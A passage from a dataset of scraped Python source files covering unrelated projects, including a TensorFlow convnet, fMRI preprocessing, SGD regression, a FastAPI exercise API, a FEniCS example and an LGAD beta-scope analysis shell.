initializer=conv_initializer, dtype=self.floattype)\n weights['b' + str(i + 1)] = tf.Variable(tf.zeros([self.dim_hidden[i]],\n dtype=self.floattype), name='b' + str(i + 1))\n\n # assumes max pooling\n weights['w6'] = tf.get_variable('w6', [self.dim_hidden[-1], self.dim_output],\n initializer=fc_initializer, dtype=self.floattype)\n weights['b6'] = tf.Variable(tf.zeros([self.dim_output], dtype=self.floattype), name='b6')\n\n return weights\n\n def forward(self, inp, weights, reuse=False, scope=''):\n # reuse is for the normalization parameters.\n\n datamean, datastd = np.array((0.4914, 0.4822, 0.4465)), np.array((0.2023, 0.1994, 0.2010))\n inp = tf_standardize(inp, datamean, datastd)\n hidden1 = self.conv_block(inp, weights['conv1'], weights['b1'], reuse, scope + '0')\n hidden2 = self.conv_block(hidden1, weights['conv2'], weights['b2'], reuse, scope + '1')\n hidden3 = self.conv_block(hidden2, weights['conv3'], weights['b3'], reuse, scope + '2')\n hidden4 = self.conv_block(hidden3, weights['conv4'], weights['b4'], reuse, scope + '3')\n hidden5 = self.conv_block(hidden4, weights['conv5'], weights['b5'], reuse, scope + '4')\n\n hidden5 = tf.reshape(hidden5, [-1, np.prod([int(dim) for dim in hidden5.get_shape()[1:]])])\n logits = tf.matmul(hidden5, weights['w6']) + weights['b6']\n\n # nparam = count_params_in_scope()\n return logits, hidden5\n\n # Network helpers\n\n def conv_block(self, inp, cweight, bweight, reuse, scope, activation=tf.nn.relu, max_pool_pad='VALID', residual=False):\n \"\"\"Perform, conv, batch norm, nonlinearity, and max pool.\"\"\"\n stride, no_stride = [1, 2, 2, 1], [1, 1, 1, 1]\n\n if self.max_pool:\n conv_output = tf.nn.conv2d(inp, cweight, no_stride, 'SAME') + bweight\n else:\n conv_output = tf.nn.conv2d(inp, cweight, stride, 'SAME') + bweight\n normed = self.normalize(conv_output, activation, reuse, scope)\n if self.max_pool:\n normed = tf.nn.max_pool(normed, stride, stride, max_pool_pad)\n return normed\n\n def normalize(self, inp, activation, reuse, scope):\n if self.norm == 'batch_norm':\n return tf_layers.batch_norm(inp, activation_fn=activation, reuse=reuse, scope=scope)\n elif self.norm == 'layer_norm':\n return tf_layers.layer_norm(inp, activation_fn=activation, reuse=reuse, scope=scope)\n elif self.norm == 'None':\n if activation is not None:\n return activation(inp)\n else:\n return inp\n","sub_path":"learners_compat/convnet.py","file_name":"convnet.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"519510174","text":"from prettytable import PrettyTable\nfrom Core.Core_databaseX import DatabaseX\nfrom Logic.Logic_ExperienciasLogic import ExperienciaLogic\nfrom Views.View_Facturas import facturasBE\nfrom Logic.Logic_TematicaLogic import TematicaLogic\nfrom Views.View_Tematica import TematicaBE\n\ndatabase = DatabaseX()\ndbexperiencia = ExperienciaLogic()\nbefacturas = facturasBE()\ndbtematica = TematicaLogic()\nbetematica = TematicaBE()\n\ndef ExperienciasPresenciales(cliente):\n result = dbexperiencia.buscarExperienciasPresenciales()\n\n table = PrettyTable()\n table1 = PrettyTable()\n\n table.field_names = [\"idExp\", \"NombreAnfitrion\", \"TituloExperiencia\", \"TipoDeExperiencia\",\n \"Ubicacion\", \"Descripcion\", \"Idioma\"]\n\n table1.field_names = [\"idExp\", \"PublicoObjetivo\", \"Organizacion\", \"AnfitrionExp\",\n \"ElementosANecesitar\", \"Precio\", \"Fecha\", \"IdTematica\"]\n\n for experiencia in result:\n table.add_row([\n experiencia.id,\n experiencia.host,\n experiencia.ExperienceTitle,\n experiencia.TypeExperience,\n experiencia.Location,\n experiencia.Descrption,\n experiencia.Idiom\n ])\n table1.add_row([\n experiencia.id,\n experiencia.PublicObject,\n experiencia.Organization,\n experiencia.hostExperience,\n experiencia.NeedElements,\n experiencia.precio,\n experiencia.fecha,\n experiencia.tematica\n ])\n\n print(table)\n table.clear()\n print(table1)\n table1.clear()\n\n option = int(input(\"¿Ver alguna experiencia en específico? (0-No||1-Sí): \"))\n \n if option == 1:\n exp = int(input(\"Ingresa el ID de la experiencia (idExp): \"))\n experiencia = dbexperiencia.searchExperienciaByIdView(exp)\n tablaexp = PrettyTable()\n tablaexp2 = PrettyTable()\n\n tablaexp.field_names = [\"idExp\", \"NombreAnfitrion\", \"TituloExperiencia\", \"TipoDeExperiencia\",\n \"Ubicacion\", \"Descripcion\", \"Idioma\"]\n\n tablaexp2.field_names = [\"PublicoObjetivo\", \"Organizacion\", \"AnfitrionExp\",\n \"ElementosANecesitar\", \"Precio\", \"Fecha\", \"IdTematica\"]\n\n tablaexp.add_row([\n experiencia.id,\n experiencia.host,\n experiencia.ExperienceTitle,\n experiencia.TypeExperience,\n experiencia.Location,\n experiencia.Descrption,\n experiencia.Idiom\n ])\n\n tablaexp2.add_row([\n experiencia.PublicObject,\n experiencia.Organization,\n experiencia.hostExperience,\n experiencia.NeedElements,\n experiencia.precio,\n experiencia.fecha,\n experiencia.tematica\n ])\n\n print(tablaexp)\n tablaexp.clear()\n print(tablaexp2)\n tablaexp2.clear()\n\n registro = int(input(\"Quieres registrarte para esta experiencia? (0-No||1-Sí): \"))\n\n if registro == 1:\n befacturas.insertarFacturaExpProceso(exp, cliente.id)\n","sub_path":"Entrega Final/Views/Process_ExpPresenciales.py","file_name":"Process_ExpPresenciales.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"573036944","text":"from fmriprep.workflows import base\nimport os\nfrom niworkflows.nipype.pipeline import engine as pe\nfrom fmriprep.interfaces import BIDSFreeSurferDir\n\n\n\nos.environ['SUBJECTS_DIR'] = '/data/freesurfer'\n\nskull_strip_ants = True\noutput_spaces = ['T1w', 'template', 'fsnative']\ntemplate = 'MNI152NLin2009cAsym'\ndebug = False\nfreesurfer = False\nlongitudinal = False\nomp_nthreads = 10\nhires = True\nreportlets_dir = '/data/reportlets/anat'\noutput_dir = '/data/derivatives/preproc_anat'\noutput_spaces = ['T1w', 'template']\n\nfsdir = pe.Node(BIDSFreeSurferDir(derivatives=output_dir,\n freesurfer_home=os.getenv('FREESURFER_HOME'),\n spaces=output_spaces),\n name='fsdir', run_without_submitting=True)\n\nwf = base.init_single_subject_wf(subject_id='012',\n task_id='binoculardots055',\n name='anatomical_wf',\n ignore=[],\n debug=False,\n anat_only=True,\n longitudinal=False,\n skull_strip_ants=skull_strip_ants,\n reportlets_dir='/data/reportlets/anat',\n output_dir=output_dir,\n bids_dir='/data/sourcedata/',\n freesurfer=freesurfer,\n output_spaces=output_spaces,\n hires=True,\n bold2t1w_dof=12,\n fmap_bspline=False,\n fmap_demean=False,\n use_syn=False,\n force_syn=False,\n output_grid_ref=None,\n use_aroma=False,\n ignore_aroma_err=True,\n omp_nthreads=4,\n template='MNI152NLin2009cAsym')\n\nwf.connect(fsdir, 'subjects_dir', wf.get_node('inputnode'), 'subjects_dir')\n\n\nwf.base_dir = '/data/workflow_folders/'\n\nplugin_settings = {}\nplugin_settings['plugin'] = 'MultiProc'\nplugin_settings['plugin_args'] = {'n_procs': 10}\n\nplugin_settings['plugin'] = 'Linear'\n\n\nwf.write_graph()\nwf.run(**plugin_settings)\n","sub_path":"src/scripts/preproc_anatomical.py","file_name":"preproc_anatomical.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"247357865","text":"#!/home/omid/anaconda2/bin/python\n\n#Building a regression model for the Boston housing prices \n\nimport matplotlib.pyplot as plt\nimport random \nfrom sklearn import datasets\nimport numpy as np\n\ndef model(x, b):\n y = b[0]\n for i in range(len(x)):\n y += b[i+1] * x[i] \n #another way to calculate y is: y = x.dot(b) \n return y\n\ndef mean(a): #calculates the mean of a vector (used in normmalization)\n\ts = 0\n\tfor i in range(len(a)):\n\t\ts += a[i]\n\treturn s/len(a)\t\n\ndef rmse_func(preds, targs): \n sum = 0\n n = len(preds)\n for i in range(0, n):\n sum += (preds[i] - targs[i]) ** 2\n return (sum / n) ** 0.5\n\n#the following function shuffles the input matrix a and the vector b\ndef shuffle_func(a, b):\n random_index = random.sample(range(len(b)), len(b))\n random_index = np.array(random_index)\n a = a[random_index, :]\n b = b[random_index]\n return (a, b)\n\n#this function normalizes the dataset by subtracting the mean of features and \n#dividing by their range, after this all features will have mean 0. We can also\n#subtract from minimum but this method seems to work better with this dataset\ndef normalize(d): \n d_normal = np.zeros(shape=d.shape)\n for i in range(d.shape[1]):\n d_normal[:, i] = (d[:, i] - mean(d[:, i]))/(max(d[:, i]) - min(d[:, i])) \n return d_normal\n\n#function to normalize targets\ndef normalize_target(t):\n t_normal = np.zeros(shape=t.shape)\n for i in range(len(t)):\n t_normal[i] = (t[i] - mean(t))/(max(t) - min(t))\n return t_normal\n\n#loading the Boston dataset \nboston = datasets.load_boston()\ndata = boston.data\ndata = normalize(data)\ntarget = boston.target\ntarget = normalize_target(target)\nn = data.shape[0]\nn_training = int(n * 0.9) #90% of the data will be used for training\nn_features = boston.feature_names.shape[0]\n\n#defining training and test sets from feature and target vectors\n#shuffle the data first to make sure we will have an unbiased and random subset\n(data, target) = shuffle_func(data, target)\n#subsetting the np array to get n_training rows:\ntrainingX = data[0 : n_training, :] \ntestX = data[n_training: , :]\n#same for y ...\ntrainingY = target[0: n_training]\ntestY = target[n_training: ]\nn_test = testX.shape[0]\n\n#defining the learning rates list to use in the algorithm \nlearning_rates = [0.00001, 0.0001, 0.001, 0.01, 0.1, 1]\n\n#rmse dictionary to store rmse lists, it uses learning rates as dictionary keys\nrmse_dict = {}\n\nfor learning_rate in learning_rates:\n # set up our initial values \n max_epochs = 10\n b = np.zeros(n_features + 1)\n current_epoch = 0\n rmse_list = np.array([])\n \n while(current_epoch < max_epochs):\n #shuffling data - shuffling can be turned off by commenting this line\n (trainingX, trainingY) = shuffle_func(trainingX, trainingY)\n #this loop takes us through one epoch of learning \n for i in range(0, n_training):\n x = trainingX[i,:] #this is one row of data\n y = trainingY[i] \n #compute the error for this data point\n error = model(x, b) - y\n #adjust the coefficients:\n b[0] = b[0] - learning_rate * error\n for i in range(0, len(x)):\n b[i+1]= b[i+1] - learning_rate*error*x[i]\n #incrementing epoch\n current_epoch += 1\n #calculating predictions \n predictions = np.array([])\n for i in range(0, n_test):\n x = testX[i,:]\n prediction = model(x, b)\n predictions = np.append(predictions, prediction)\n #calculating rmse\n rmse = rmse_func(predictions, testY)\n rmse_list = np.append(rmse_list, rmse)\n \n #this dictionary holds the rmse values (as a list) for each learning_rate\n rmse_dict[learning_rate] = rmse_list\n\n\n#plotting \np = 1\nfor learning_rate in learning_rates:\n plt.figure(p)\n title = \"RMSE values with learning rate %f\" %(learning_rate)\n fig_name = \"Question1 %f.png\" %(learning_rate)\n plt.title(title, fontsize=8)\n plt.plot(range(0, max_epochs), rmse_dict[learning_rate])\n plt.xticks(range(0, max_epochs))\n plt.xlabel(\"epoch\", fontsize=8)\n plt.ylabel(\"RMSE\", fontsize=8)\n plt.savefig(fig_name)\n p += 1\nplt.show() \n\n\n\n\n","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"228003200","text":"import argparse\nclass Options:\n def __init__(self, description, con):\n self.parser = argparse.ArgumentParser(description=description)\n\n self.add(name=con.title['name'], _type=con.title['type'], _default=con.title['default'], _help=con.title['help'])\n self.add(name=con.method['name'], _type=con.method['type'], _default=con.method['default'], _help=con.method['help'])\n self.add(name=con.dataset['name'], _type=con.dataset['type'], _default=con.dataset['default'], _help=con.dataset['help'])\n self.add(name=con.random_seed['name'], _type=con.random_seed['type'], _default=con.random_seed['default'], _help=con.random_seed['help'])\n self.add(name=con.avoid_skewness['name'], _type=con.avoid_skewness['type'], _default=con.avoid_skewness['default'], _help=con.avoid_skewness['help'])\n self.add(name=con.KFold['name'], _type=con.KFold['type'], _default=con.KFold['default'], _help=con.KFold['help'])\n self.add(name=con.print_details['name'], _type=con.print_details['type'], _default=con.print_details['default'], _help=con.print_details['help'])\n self.add(name=con.show_fitting['name'], _type=con.show_fitting['type'], _default=con.show_fitting['default'], _help=con.show_fitting['help'])\n \n self.add(name=con.data_folder['name'], _type=con.data_folder['type'], _default=con.data_folder['default'], _help=con.data_folder['help'])\n self.add(name=con.data_method['name'], _type=con.data_method['type'], _default=con.data_method['default'], _help=con.data_method['help'])\n self.add(name=con.predict_label['name'], _type=con.predict_label['type'], _default=con.predict_label['default'], _help=con.predict_label['help'])\n self.add(name=con.predict_method['name'], _type=con.predict_method['type'], _default=con.predict_method['default'], _help=con.predict_method['help'])\n\n def add(self, name, _type, _default, _help):\n self.parser.add_argument(\n '--'+name, \n type=_type, \n default=_default, \n help=_help)\n\n def parse(self):\n self.args = self.parser.parse_args()\n self.args_dict = vars(self.args) #args as a dict, for printing purposes","sub_path":"_class/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314098255","text":"f = open(\"input.txt\")\r\nw = open(\"output.txt\", 'w')\r\nline = f.readline().split()\r\nn_condition, m_condition = [int(i) for i in line]\r\nadj_list = [[] for i in range(n_condition)]\r\nfor i in range(m_condition):\r\n line = f.readline().split()\r\n a, b = [int(j) for j in line]\r\n adj_list[a - 1].append(b)\r\n adj_list[b - 1].append(a)\r\nfor i in range(n_condition):\r\n w.write(str(len(adj_list[i])) + ' ')\r\n for j in range(len(adj_list[i])):\r\n w.write(str(adj_list[i][j]) + ' ')\r\n w.write('\\n')\r\n","sub_path":"grafs/adjacency_list.py","file_name":"adjacency_list.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"525810548","text":"'''\ncommandline oriented interface using the cmd module for the beta-scope analysis\n'''\n\nimport readline\nreadline.get_completer_delims()\n#readline.set_completer_delims(' \\t\\n;')\n\nimport glob\nimport os\nimport sys\nimport cmd\nimport subprocess\nimport threading\nimport multiprocessing as mp\nfrom colorStringFormating import *\n\npredefined_path = {\n\"__raw\":\"/media/mnt/BigHD/Beta_DAQ_Data/\",\n\"__yuzhan\":\"/media/mnt/BigHD/BetaScope_Data/Analyzed_YZ/\",\n\"__simone\":\"/media/mnt/BigHD/BetaScope_Data/Analyzed_Simone/\"\n}\n\nclass Lgad(cmd.Cmd, object):\n\n intro = colorString.colorFormat(\" Interface for beta-scope analysis\", \"cyan\")\n prompt = colorString.colorFormat(\"(LGAD) \", \"yellow\")\n\n global predefined_path\n\n def __init__(self):\n self.raw_dir = predefined_path[\"__raw\"]\n self.files = os.listdir(os.getcwd())\n cmd.Cmd.__init__(self)\n\n def cmdloop(self, intro=None):\n print(self.intro)\n while True:\n try:\n super(Lgad, self).cmdloop(intro=\"\")\n except KeyboardInterrupt:\n colorString.sysError(\"You have pressed ctrl+C! do you want to exit?(press again to exit)\" )\n raw_input()\n\n def completedefault(self, text, line, begidx, endidx):\n return [i for i in self.files if i.startswith(text)]\n\n def emptyline(self):\n pass\n\n def do_cd(self, tdir):\n \"change direcotry, similar to the usual cd in cml.\"\n #glob.glob(os.path.expanduser(str(tdir)+\"*\"))\n #os.path.expanduser(tdir)\n if tdir:\n pass\n else:\n tdir = \".\"\n if \"~\" in tdir:\n tdir = os.path.expanduser(\"~\") + tdir.split(\"~\")[1]\n self.files = os.listdir(os.getcwd())\n\n if tdir in predefined_path:\n tdir = predefined_path[tdir]\n self.files = os.listdir(os.getcwd())\n\n try:\n os.chdir(tdir)\n colorString.sysMsg(\"changed dir to {}\".format(tdir) )\n self.files = os.listdir(os.getcwd())\n except OSError:\n print(colorString.colorFormat(\"Cannot find {}\".format(tdir), \"red\"))\n\n #'''\n def default(self, line):\n subprocess.call(line, shell=True)\n #'''\n\n '''\n def do_pwd(self, tdir=\"\"):\n print( os.getcwd() )\n '''\n\n def do_set_output_dir(self, path ):\n \"Setup the stats file output direcotry. If you have predefined path, you can use it. \"\n if path in predefined_path:\n self.output_dir = predefined_path[path]\n colorString.sysMsg(\"output path is set to {}\".format(self.output_dir) )\n else:\n try:\n self.output_dir = path\n colorString.sysMsg(\"output path is set to {}\".format(self.output_dir) )\n except:\n colorString.sysError(\"cannot to output path to {}\".format(self.output_dir) )\n\n\n def do_set_run( self, runNum):\n \"Setup a run for analysis. It will automatically search the run number in the pre-defined raw data direcotry. If it can find the run number , it will create a folder for the run in your output direcotry\"\n if hasattr(self, \"output_dir\"):\n if self.output_dir:\n pass\n else:\n colorString.sysError(\"output direcotry has not been set. Please run set_output_dir\" )\n else:\n colorString.sysError(\"output direcotry has not been set. Please run set_output_dir\" )\n\n for d in os.listdir( self.raw_dir ):\n if \"Sr_Run\"+str( runNum ) in d:\n self.runNum = runNum\n self.runNum_dir = d\n\n\n if hasattr(self, \"runNum\"):\n if not os.path.isdir(self.output_dir + \"/\" + self.runNum_dir):\n os.mkdir( self.output_dir + \"/\" + self.runNum_dir )\n self.current_run = self.output_dir + \"/\" + self.runNum_dir\n else:\n self.current_run = self.output_dir + \"/\" + self.runNum_dir\n colorString.sysError(\"direcotry {} is already there\".format(self.current_run) )\n else:\n colorString.sysError(\"No run number {}\".format(runNum) )\n\n def do_cd_current_run(self, tdir=\"\"):\n \"change direcotry to the run you set from set_run\"\n self.do_cd( self.current_run )\n\n\n def do_generate_config(self, place_holder=\"\"):\n \"Generate configuration file for the beta-scope waveform analyzer.\"\n subprocess.call(\"${BETASCOPE_SCRIPTS}/../BetaScope_Ana/BetaScopeWaveformAna/bin/GenerateWaveformConfig\", shell=True)\n\n def do_set_default_config(self, place_holder=\"\"):\n \"Set the configuration file to default for beta-scope waveform analyzer\"\n import configparser\n\n global predefined_path\n\n __raw_data_dir = self.raw_dir\n __data_output_dir = self.current_run\n __runNum = self.runNum\n\n parser = configparser.ConfigParser()\n parser.optionxform = str\n parser.read(\"WaveformAnaConfig.ini\")\n parser.set(\"General\",\"rawFilesDir\", \"{raw_dir}/{raw_data}/fromDAQ/\".format(raw_dir=__raw_data_dir, raw_data=self.runNum_dir) )\n parser.set(\"Channel_Activation\", \"channel_2\", \"1\")\n parser.set(\"Channel_Activation\", \"channel_3\", \"1\")\n parser.set(\"Channel_Invertion\", \"channel_2\", \"1\")\n with open(\"WaveformAnaConfig.ini\", \"wb\") as config:\n parser.write(config)\n\n def do_set_active_channel(self, ch):\n import configparser\n parser = configparser.ConfigParser()\n parser.set(\"Channel_Activation\", \"channel_{ch}\".format(ch=ch), 1)\n with open(\"WaveformAnaConfig.ini\", \"wb\") as config:\n parser.write(config)\n\n\n def do_show_ana_progress(self, opt=\"\"):\n if \"persist\" in opt:\n os.system(\"watch --color tail $BETASCOPE_SCRIPTS/nohup.log\")\n else:\n os.system(\"tail $BETASCOPE_SCRIPTS/nohup.log\")\n\n def do_auto_cut( self, run=\"\" ):\n if not hasattr(self,\"current_run\"):\n if not run:\n print(\"please specify a run number\")\n return -1\n else:\n self.do_set_run(run)\n self.do_cd_current_run()\n p = subprocess.call(\"python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num}\".format(num=self.runNum), shell=True)\n else:\n self.do_cd_current_run()\n p = subprocess.call(\"python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num}\".format(num=self.runNum), shell=True)\n\n def do_run_analysis(self, mode=\"\"):\n \"Run routine beta-scope analysis. Argument with 'full' will do the full rountine analysis, else it will only generate stats files. Argument with 'nohup' will supress the output \"\n if not hasattr(self, \"current_run\"):\n colorString.sysError(\"current run is not set\" )\n\n else:\n self.do_cd_current_run()\n\n if \"nohup\" in mode:\n nohup = \"nohup\"\n nohup_log = \" >> $BETASCOPE_SCRIPTS/nohup.log\"\n\n def isRunning(pid):\n while True:\n if os.path.isdir(\"/proc/{}\".format(pid)):\n continue\n else:\n break\n\n else:\n nohup = \"\"\n nohup_log = \"\"\n\n if not nohup:\n p = subprocess.Popen(\"{nohup} $BETASCOPE_SCRIPTS/../BetaScope_Ana/BetaScopeWaveformAna/bin/Run_WaveformAna {tdir}/WaveformAnaConfig.ini --skipWaveform {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log, tdir=self.current_run), shell=True)\n p.wait()\n\n if \"full\" in mode:\n p = subprocess.Popen(\"{} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GenerateDataProcessorConfig.exe {}\".format(nohup, nohup_log), shell=True)\n p.wait()\n\n p = subprocess.call(\"{nohup} python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num} {nohup_log}\".format(num=self.runNum, nohup=nohup, nohup_log=nohup_log), shell=True)\n\n p = subprocess.Popen(\"{nohup} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GetResults.exe run_info_v08022018.ini {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log), shell=True)\n p.wait()\n else:\n def nohupRun(mode):\n p = subprocess.Popen(\"{nohup} $BETASCOPE_SCRIPTS/../BetaScope_Ana/BetaScopeWaveformAna/bin/Run_WaveformAna {tdir}/WaveformAnaConfig.ini --skipWaveform {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log, tdir=self.current_run), shell=True)\n #pid = p.pid\n #isRunning(pid)\n p.wait()\n if \"full\" in mode:\n p = subprocess.Popen(\"{} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GenerateDataProcessorConfig.exe {}\".format(nohup, nohup_log), shell=True)\n #pid = p.pid\n #isRunning(pid)\n p.wait()\n\n p = subprocess.call(\"{nohup} python2 $BETASCOPE_SCRIPTS/betaScope_pyScript/autoCut_v2.py --runNum {num} {nohup_log}\".format(num=self.runNum, nohup=nohup, nohup_log=nohup_log), shell=True)\n\n p = subprocess.Popen(\"{nohup} /home/yuzhan/HGTD_BetaScope/BetaScopeDataProcessor/bin/GetResults.exe run_info_v08022018.ini {nohup_log}\".format(nohup=nohup, nohup_log=nohup_log), shell=True)\n p.wait()\n\n #job = threading.Thread(name=\"nohupRun\", target=nohupRun, args=(mode,) )\n job = mp.Process(target=nohupRun, args=(mode,) )\n job.daemon = True\n job.start()\n\n\nif __name__ == \"__main__\":\n interface = Lgad()\n interface.cmdloop()\n","sub_path":"scripts/lgad.py","file_name":"lgad.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"399018898","text":"# coding: utf-8\n# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department\n# Distributed under the terms of \"New BSD License\", see the LICENSE file.\n\nfrom fenics import *\n\n\ndef poisson_nonlinear():\n # Warning: from fenics import * will import both `sym` and\n # `q` from FEniCS. We therefore import FEniCS first and then\n # overwrite these objects.\n\n def q(u):\n \"Return nonlinear coefficient\"\n return 1 + u ** 2\n\n # Use SymPy to compute f from the manufactured solution u\n import sympy as sym\n x, y = sym.symbols('x[0], x[1]')\n u = 1 + x + 2 * y\n f = - sym.diff(q(u) * sym.diff(u, x), x) - sym.diff(q(u) * sym.diff(u, y), y)\n f = sym.simplify(f)\n u_code = sym.printing.ccode(u)\n f_code = sym.printing.ccode(f)\n # print('u =', u_code)\n # print('f =', f_code)\n\n # Create mesh and define function space\n mesh = UnitSquareMesh(8, 8)\n V = FunctionSpace(mesh, 'P', 1)\n\n # Define boundary condition\n u_D = Expression(u_code, degree=2)\n\n def boundary(x, on_boundary):\n return on_boundary\n\n bc = DirichletBC(V, u_D, boundary)\n\n # Define variational problem\n u = Function(V) # Note: not TrialFunction!\n v = TestFunction(V)\n f = Expression(f_code, degree=2)\n F = q(u) * dot(grad(u), grad(v)) * dx - f * v * dx\n\n # Compute solution\n solve(F == 0, u, bc)\n\n # # Plot solution\n # plot(u)\n\n # # Compute maximum error at vertices. This computation illustrates\n # # an alternative to using compute_vertex_values as in poisson.py.\n # u_e = interpolate(u_D, V)\n # import numpy as np\n # error_max = np.abs(u_e.vector().array() - u.vector().array()).max()\n # print('error_max = ', error_max)\n\n # # Hold plot\n # interactive()\n\n return u.compute_vertex_values(mesh)\n","sub_path":"tests_integration/continuum/fenics/tutorials/page_8.py","file_name":"page_8.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453227893","text":"import mock\nimport pytest\nimport env\nimport click\nfrom click.testing import CliRunner\nfrom tests.factories import factory\nfrom personalwebpageapi.cli import cli\nfrom personalwebpageapi.models.auth import Auth\n\n\n@pytest.fixture\ndef runner():\n return CliRunner()\n\n\n@mock.patch('flask.Flask.run')\ndef test_cli_dev_command_without_command(mocker, runner):\n mocker.return_value = None\n\n env.APP_ENV = 'dev'\n result = runner.invoke(cli)\n\n assert result.exit_code == 0\n mocker.assert_called_once()\n\n\n@mock.patch('waitress.serve')\ndef test_cli_prod_command_without_command(mocker, runner):\n mocker.return_value = None\n\n env.APP_ENV = 'prod'\n result = runner.invoke(cli)\n\n assert result.exit_code == 0\n mocker.assert_called_once()\n\n\ndef test_cli_token_command_without_params(runner):\n result = runner.invoke(cli, ['token'])\n assert 'Error: no option provided' in result.output\n\n\ndef test_cli_token_list(runner):\n factory(Auth).create(token='token_1')\n factory(Auth).create(token='token_2')\n\n result = runner.invoke(cli, ['token', '-l'])\n\n assert result.exit_code == 0\n assert result.output == 'token_1\\ntoken_2\\n'\n\n\n@mock.patch('personalwebpageapi.cli.token_generator')\ndef test_cli_token_create(mocker, runner):\n mocker.return_value = 'test_token'\n\n result = runner.invoke(cli, ['token', '-c'])\n auth_token = Auth.where('token', 'test_token').get()\n\n assert auth_token\n mocker.assert_called_with(100)\n","sub_path":"tests/cli/test_cli_commands.py","file_name":"test_cli_commands.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"505439807","text":"from typing import List\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom src import config\nfrom src.schemas import schemas\nfrom src.api import crud\nfrom src.database import database\nfrom src.utils import enums\n\nrouter = APIRouter(\n prefix=\"/api\",\n tags=[\"Exercises\"],\n)\n\n@router.get(\"/exercises\", response_model=List[schemas.Exercise])\nasync def get_exercises(skip: int = 0, limit: int = 100, db: Session = Depends(database.get_db)):\n exercises = crud.get_exercises(db, skip=skip, limit=limit)\n return exercises\n\n@router.post(\"/exercises\", response_model=schemas.ExerciseCreate)\nasync def create_exercise(exercise: schemas.ExerciseCreate, db: Session = Depends(database.get_db)):\n return crud.add_exercise(db=db, exercise=exercise)\n\n@router.get(\"/exercises/{exercise_id}\", response_model=schemas.Exercise)\nasync def get_exercise(exercise_id: int, db: Session = Depends(database.get_db)):\n response = crud.get_exercise(db=db, exercise_id=exercise_id)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Exercise not found\")\n return response\n\n@router.get(\"/types/{exercise_type}\", response_model=List[schemas.Exercise])\nasync def get_exercises_by_type(exercise_type: enums.TypeEnum, db: Session = Depends(database.get_db)):\n response = crud.get_exercises_by_type(db=db, exercise_type=exercise_type)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Exercise not found\")\n return response\n\n\n@router.get(\"/muscles/{exercise_muscle}\", response_model=List[schemas.Exercise])\nasync def get_exercises_by_muscle(exercise_muscle: enums.MuscleEnum, db: Session = Depends(database.get_db)):\n response = crud.get_exercises_by_muscle(db=db, exercise_muscle=exercise_muscle)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Exercise not found\")\n return response\n\n@router.get(\"/equipment/{exercise_equipment}\", response_model=List[schemas.Exercise])\nasync def get_exercises_by_equipment(exercise_equipment: enums.EquipmentEnum, db: Session = Depends(database.get_db)):\n response = crud.get_exercises_by_equipment(db=db, exercise_equipment=exercise_equipment)\n \n if response is None:\n raise HTTPException(status_code=404, detail=\"Equipment not found\")\n return response\n","sub_path":"src/routes/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497715755","text":"# Solar system\n# Python script created by Daniel Sanaee\n# 2021-01.16\nimport sys\nfor p in sys.path:\n print(p)\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\ndef main():\n\n class solarsystem_object():\n \"\"\"The solarsystem\"\"\"\n def __init__(self):\n self._size = 0\n self.time = 0\n self.data = {}\n\n def simulation_parameters(self):\n \"\"\"Add simulation time parameters\"\"\"\n self.time = None\n self.hour_step = None\n self.years = None\n self.dt = None\n self.steps = None\n\n def add_sun(self):\n \"\"\"Add sun to solarsystem\"\"\"\n self._size += 1\n self.sun = _round_object()\n self.sun.name = \"sun\"\n self.data[\"sun\"] = [333000, 109, 0, 0, 0, 0, \"#f7dc6f\"]\n\n def add_mercury(self):\n \"\"\"Add mercury to solarsystem\"\"\"\n self._size += 1\n self.mercury = _round_object()\n self.mercury.name = \"mercury\"\n self.data[\"mercury\"] = [0.055, 0.3829, 0.387, 0, 0, (47.362/29.78)*(2*math.pi), \"#b2babb\"]\n\n def add_venus(self):\n \"\"\"Add venus to solarsystem\"\"\"\n self._size += 1\n self.venus = _round_object()\n self.venus.name = \"venus\"\n self.data[\"venus\"] = [0.815, 0.95, 0.72, 0, 0, (35.02/29.78)*(2*math.pi), \"#f9e79f\"]\n\n def add_earth(self):\n \"\"\"Add earth to solarsystem\"\"\"\n self._size += 1\n self.earth = _round_object()\n self.earth.name = 